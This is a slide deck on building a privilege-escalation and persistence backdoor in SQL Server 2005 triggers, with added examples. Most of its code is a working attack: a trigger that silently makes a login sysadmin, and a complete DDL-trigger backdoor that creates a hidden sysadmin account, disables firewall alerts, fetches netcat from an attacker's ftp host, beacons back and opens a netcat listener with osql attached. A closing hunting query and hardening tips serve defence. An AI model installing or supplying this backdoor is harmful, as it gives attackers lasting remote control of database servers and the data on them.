MSSql server 2005 backdoor
MSSQL SERVER 2005
BACKDOOR
Duong Ngo
October 14, 2009
POST-EXPLOITATION
Got access to an MSSQL box? (SQL injection,
brute force…)
Privileges: sa / dbo / normal user
Got all data
Now what’s next??
Backdoors
Provide easier access to the compromised
box in the future
Types of backdoors:
OS backdoors (rootkits),
Web server backdoors (PHP shell, CGI-Telnet..)
So how about a database backdoor?? YES!
SQL Server 2005 Backdoor
We’ll create a backdoor based on a SQL Server
trigger.
What’s a trigger?
Database Trigger
A special kind of stored procedure that
executes automatically when a statement of
the specified kind is run: a DML trigger fires
when a user runs a data-modification statement
(INSERT, UPDATE, DELETE..) on the specified
table; a DDL trigger (new in SQL Server 2005)
fires on CREATE, ALTER, DROP and similar
statements at database or server scope.
A trigger executes under the security context
of whoever caused it to fire, not of whoever
created it (unless it was created WITH
EXECUTE AS)!
EXAMPLE – Create trigger
Context: normal user who may create a trigger on tblCustomers
(CREATE TRIGGER requires ALTER permission on the table):
-- the login 'Hacker' must already exist on the server
CREATE TRIGGER trg_gain_privilege ON tblCustomers FOR
INSERT, DELETE, UPDATE
AS
EXEC sp_addsrvrolemember @loginame = 'Hacker',
@rolename = N'sysadmin'
EXAMPLE – Trigger gets fired
Context: sa (server admin)
sa> DELETE FROM tblCustomers
RESULT??
The trigger ran with sa's rights, so sp_addsrvrolemember
succeeded: login 'Hacker' is now a sysadmin.
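The security-context claim is the whole basis of the attack, so it is worth seeing it directly. The following is an added example written for this page, not the author's code: a throwaway script that logs who fired a trigger and whether that login was a sysadmin at the time. The database, table, login and user names are assumptions. Run it as sa on a test instance.

```sql
-- Added example (not from the slides): a trigger runs with the rights of the
-- login that fires it, not of the user who created it.
-- TrigDemo, tblCustomers, LowPrivLogin and LowPrivUser are assumed names.
USE master;
GO
CREATE LOGIN LowPrivLogin WITH PASSWORD = 'LowPriv123#';
CREATE DATABASE TrigDemo;
GO
USE TrigDemo;
GO
CREATE USER LowPrivUser FOR LOGIN LowPrivLogin;
CREATE TABLE tblCustomers (id int IDENTITY PRIMARY KEY, name nvarchar(50));
CREATE TABLE trg_context_log (
    fired_at       datetime DEFAULT GETDATE(),
    login_name     sysname,   -- SUSER_SNAME(): login the statement ran as
    original_login sysname,   -- ORIGINAL_LOGIN(): login that opened the session
    db_user        sysname,   -- USER_NAME(): database user it maps to
    is_sysadmin    int        -- IS_SRVROLEMEMBER('sysadmin') at firing time
);
-- CREATE TRIGGER needs ALTER on the table; the trigger body also inserts rows
GRANT ALTER, INSERT ON tblCustomers TO LowPrivUser;
GRANT INSERT ON trg_context_log TO LowPrivUser;
GO
-- Create the trigger while impersonating the low-privileged login
EXECUTE AS LOGIN = 'LowPrivLogin';
GO
CREATE TRIGGER trg_log_context ON tblCustomers FOR INSERT, UPDATE, DELETE
AS
    INSERT INTO trg_context_log (login_name, original_login, db_user, is_sysadmin)
    VALUES (SUSER_SNAME(), ORIGINAL_LOGIN(), USER_NAME(), IS_SRVROLEMEMBER('sysadmin'));
GO
-- Fire it once while still impersonating the low-privileged login
INSERT INTO tblCustomers (name) VALUES (N'from LowPrivLogin');
REVERT;
GO
-- Fire the very same trigger as sa, then compare the two logged rows
INSERT INTO tblCustomers (name) VALUES (N'from sa');
SELECT fired_at, login_name, original_login, db_user, is_sysadmin
FROM trg_context_log
ORDER BY fired_at;
GO
-- Cleanup (uncomment on a test box):
-- USE master; DROP DATABASE TrigDemo; DROP LOGIN LowPrivLogin;
```

The first logged row shows LowPrivLogin / LowPrivUser with is_sysadmin 0; the second shows sa / dbo with is_sysadmin 1, although the trigger code is identical and was created by the low-privileged user. ORIGINAL_LOGIN() reads sa in both rows, which is why it, rather than SUSER_SNAME(), is the column to audit when impersonation is in play.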
What can we do with that?
Privilege escalation: normal user -> higher
role
Database backdoor
SQL Server backdoor features:
- Execute the remaining commands only if the current user is 'sa'
(or, more generally, a member of the sysadmin role)
- Enable xp_cmdshell
- Create a new login 'backdoor' and add it to the sysadmin server
role.
- Disable Windows Firewall notification mode
- Add ftp to the firewall's allowed-programs list
- Fetch netcat from the attacker's ftp server
- Create a directory 'Backdoor_activated' on the attacker's ftp
server so the attacker knows whenever the backdoor has
been activated.
- Start netcat in listen mode with the SQL command-line client
osql attached to the connection.
Our Backdoor’s Code
CREATE TRIGGER trg_backdoor ON DATABASE FOR
DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
DECLARE @cur_user varchar(200)
……
-- persistent sysadmin login (same spelling in both statements:
-- a case-sensitive collation would not find 'Backdoor')
CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#';
EXEC sys.sp_addsrvrolemember @loginame = N'backdoor',
@rolename = N'sysadmin'
-- disable firewall notification mode (no pop-up when netcat starts listening)
EXEC master..xp_cmdshell 'netsh firewall set notifications disable'
…..
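As an added example, and not the author's original script (whose elided parts are not on the page), here is a complete DDL-trigger backdoor assembled from the feature list on the previous slides. The login name and password, the attacker's ftp host and credentials, the file paths and the listener port are all assumptions. Two deliberate differences from the slides: it checks membership in the sysadmin role instead of comparing the user name to 'sa', and it does not try to enable xp_cmdshell from inside the trigger. The sysadmin login is created as soon as any sysadmin fires the trigger; the OS stage runs only when xp_cmdshell is already on, so the attacker can switch it on later from a normal session with the new login and then fire the trigger again.

```sql
-- Added example: complete DDL-trigger backdoor built from the slides' feature
-- list. Not the author's script. Assumed: TargetDb, the 'backdoor' login and
-- password, ftp host 192.0.2.10 with ftpuser/ftppass, C:\Windows\Temp, nc.exe
-- on the ftp server, listener port 1337.
-- Installing it needs ALTER ANY DATABASE DDL TRIGGER in TargetDb (db_owner has it).
USE TargetDb;
GO
CREATE TRIGGER trg_backdoor ON DATABASE FOR DDL_DATABASE_LEVEL_EVENTS
AS
BEGIN
    SET NOCOUNT ON;

    -- The trigger runs as whoever fired it, so do nothing (and stay quiet)
    -- until a sysadmin runs some DDL in this database.
    IF ISNULL(IS_SRVROLEMEMBER('sysadmin'), 0) <> 1 RETURN;

    -- Stage 1: persistent sysadmin login, created once
    IF NOT EXISTS (SELECT 1 FROM sys.server_principals WHERE name = N'backdoor')
    BEGIN
        CREATE LOGIN [backdoor] WITH PASSWORD = 'Backdoor123#', CHECK_POLICY = OFF;
        EXEC sys.sp_addsrvrolemember @loginame = N'backdoor', @rolename = N'sysadmin';
    END

    -- Stage 2: OS foothold, only once xp_cmdshell is enabled on the instance
    IF ISNULL((SELECT value_in_use FROM sys.configurations
               WHERE name = N'xp_cmdshell'), 0) <> 1 RETURN;

    DECLARE @localdir varchar(100), @cmdfile varchar(120),
            @fileget  varchar(20),  @cmd     varchar(500);
    SET @localdir = 'C:\Windows\Temp';           -- assumed writable drop directory
    SET @cmdfile  = @localdir + '\ftp.txt';
    SET @fileget  = 'nc.exe';

    -- silence Windows Firewall pop-ups and let ftp.exe out
    EXEC master..xp_cmdshell 'netsh firewall set notifications disable', NO_OUTPUT;
    EXEC master..xp_cmdshell 'netsh firewall add allowedprogram program=C:\Windows\System32\ftp.exe name=Printer mode=ENABLE scope=ALL profile=ALL', NO_OUTPUT;

    -- write an ftp script: log in, fetch netcat into @localdir, then create the
    -- 'Backdoor_activated' directory on the attacker's server as the beacon.
    -- No space before >> on the credential lines, or ftp reads a trailing blank.
    SET @cmd = 'echo open 192.0.2.10 > ' + @cmdfile;            EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'echo ftpuser>>' + @cmdfile;                     EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'echo ftppass>>' + @cmdfile;                     EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'echo binary>>' + @cmdfile;                      EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'echo lcd ' + @localdir + '>>' + @cmdfile;       EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'echo get ' + @fileget + '>>' + @cmdfile;        EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'echo mkdir Backdoor_activated>>' + @cmdfile;    EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'echo quit>>' + @cmdfile;                        EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'ftp -s:' + @cmdfile;                            EXEC master..xp_cmdshell @cmd, NO_OUTPUT;

    -- allow the downloaded netcat through the firewall, then start it detached
    -- ('start', so xp_cmdshell and the DDL statement that fired us return)
    -- listening on 1337 with osql attached; osql uses Windows auth by default,
    -- i.e. the SQL Server service account that runs xp_cmdshell (assumed sysadmin)
    SET @cmd = 'netsh firewall add allowedprogram program=' + @localdir + '\' + @fileget
             + ' name=Printer mode=ENABLE scope=ALL profile=ALL';
    EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
    SET @cmd = 'start "" ' + @localdir + '\' + @fileget + ' -L -p 1337 -e osql.exe';
    EXEC master..xp_cmdshell @cmd, NO_OUTPUT;

    -- remove the ftp script with the credentials in it
    SET @cmd = 'del ' + @cmdfile;
    EXEC master..xp_cmdshell @cmd, NO_OUTPUT;
END
GO
```

One operational caveat: a DDL trigger runs inside the transaction of the statement that fired it, so any error in the body (a failed CREATE LOGIN, a typo in a netsh command that xp_cmdshell happens to surface) rolls back the admin's own DDL and shows them an error mentioning the trigger. Keeping the body short and guarded, as above, is what keeps it quiet.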
Why DDL_DATABASE_LEVEL_EVENTS?
Because it covers every database-level DDL event, including
all of these, so an admin doing routine schema work will
fire the trigger sooner or later:
CREATE_TABLE, ALTER_TABLE, DROP_TABLE
CREATE_VIEW, ALTER_VIEW, DROP_VIEW
CREATE_SYNONYM, DROP_SYNONYM
CREATE_FUNCTION, ALTER_FUNCTION, DROP_FUNCTION
CREATE_PROCEDURE, ALTER_PROCEDURE, DROP_PROCEDURE
CREATE_TRIGGER, ALTER_TRIGGER, DROP_TRIGGER
CREATE_EVENT_NOTIFICATION, DROP_EVENT_NOTIFICATION
….
Our Backdoor’s Code (cont)
-- save ftp commands to an external file
SET @cmd = 'echo GET ' + @fileget + ' >> ' + @cmdfile
…..
-- execute ftp with the commands loaded from the file we created
SET @cmd = 'ftp -s:' + @cmdfile
EXEC master..xp_cmdshell @cmd, NO_OUTPUT
……
-- after getting netcat, add it to the firewall’s allowedprogram list
SET @cmd = 'netsh firewall add allowedprogram program=' +
@localdir + '\' + @fileget + ' name=Printer mode=ENABLE ' +
'scope=ALL profile=ALL'
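For the defensive side, an added example that is not part of the slides: a hunting query that enumerates every server-scoped DDL trigger, database-scoped DDL trigger and DML trigger on the instance and flags bodies that reference the calls this kind of backdoor depends on. Encrypted trigger bodies and CLR triggers cannot be searched and are flagged separately. The pattern list is an assumption; extend it for your environment. Run as sysadmin.

```sql
-- Added example (not from the slides): enumerate all triggers on the instance
-- and flag suspicious bodies. The pattern list below is an assumed starting set.
SET NOCOUNT ON;
CREATE TABLE #patterns (p nvarchar(100));
INSERT INTO #patterns SELECT N'%xp_cmdshell%'
UNION ALL SELECT N'%sp_addsrvrolemember%'
UNION ALL SELECT N'%CREATE LOGIN%'
UNION ALL SELECT N'%sp_configure%'
UNION ALL SELECT N'%IS_SRVROLEMEMBER%'
UNION ALL SELECT N'%netsh%';

CREATE TABLE #found (
    db           sysname,
    scope        varchar(8),          -- SERVER, DATABASE (DDL) or DML
    trigger_name sysname,
    parent_obj   sysname NULL,        -- table/view for DML triggers
    trigger_type nvarchar(60),        -- SQL_TRIGGER or CLR_TRIGGER
    is_disabled  bit,
    hit          nvarchar(100) NULL   -- first matching pattern, or a note
);

-- Server-scoped DDL triggers (e.g. FOR CREATE_LOGIN across the instance).
-- WITH ENCRYPTION leaves definition NULL, which is itself worth a look.
INSERT INTO #found
SELECT N'(server)', 'SERVER', t.name, NULL, t.type_desc, t.is_disabled,
       COALESCE(h.p, CASE WHEN t.type_desc = N'SQL_TRIGGER' AND m.definition IS NULL
                          THEN N'(encrypted body)' END)
FROM sys.server_triggers t
LEFT JOIN sys.server_sql_modules m ON m.object_id = t.object_id
OUTER APPLY (SELECT TOP 1 p FROM #patterns WHERE UPPER(m.definition) LIKE UPPER(p)) h;

-- Database-scoped DDL triggers (parent_class 0) and DML triggers, per database
DECLARE @db sysname, @sql nvarchar(max);
DECLARE dbs CURSOR LOCAL FAST_FORWARD FOR
    SELECT name FROM sys.databases WHERE state_desc = N'ONLINE';
OPEN dbs;
FETCH NEXT FROM dbs INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @sql = N'INSERT INTO #found
        SELECT ' + QUOTENAME(@db, '''') + N',
               CASE t.parent_class WHEN 0 THEN ''DATABASE'' ELSE ''DML'' END,
               t.name, o.name, t.type_desc, t.is_disabled,
               COALESCE(h.p, CASE WHEN t.type_desc = N''SQL_TRIGGER'' AND m.definition IS NULL
                                  THEN N''(encrypted body)'' END)
        FROM ' + QUOTENAME(@db) + N'.sys.triggers t
        LEFT JOIN ' + QUOTENAME(@db) + N'.sys.objects o     ON o.object_id = t.parent_id
        LEFT JOIN ' + QUOTENAME(@db) + N'.sys.sql_modules m ON m.object_id = t.object_id
        OUTER APPLY (SELECT TOP 1 p FROM #patterns
                     WHERE UPPER(m.definition) LIKE UPPER(p)) h;';
    EXEC sp_executesql @sql;
    FETCH NEXT FROM dbs INTO @db;
END
CLOSE dbs;
DEALLOCATE dbs;

-- Hits first, then every other trigger so unexpected ones stand out too
SELECT db, scope, trigger_name, parent_obj, trigger_type, is_disabled, hit
FROM #found
ORDER BY CASE WHEN hit IS NULL THEN 1 ELSE 0 END, db, scope, trigger_name;

DROP TABLE #patterns;
DROP TABLE #found;
```

Pair the query with the cheap controls that remove the preconditions the slides rely on: leave xp_cmdshell disabled, grant ALTER on tables and ALTER ANY DATABASE DDL TRIGGER only where a user genuinely needs them, and do routine schema work from a non-sysadmin account so a waiting trigger never fires with sysadmin rights.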
Thank You
for listening!!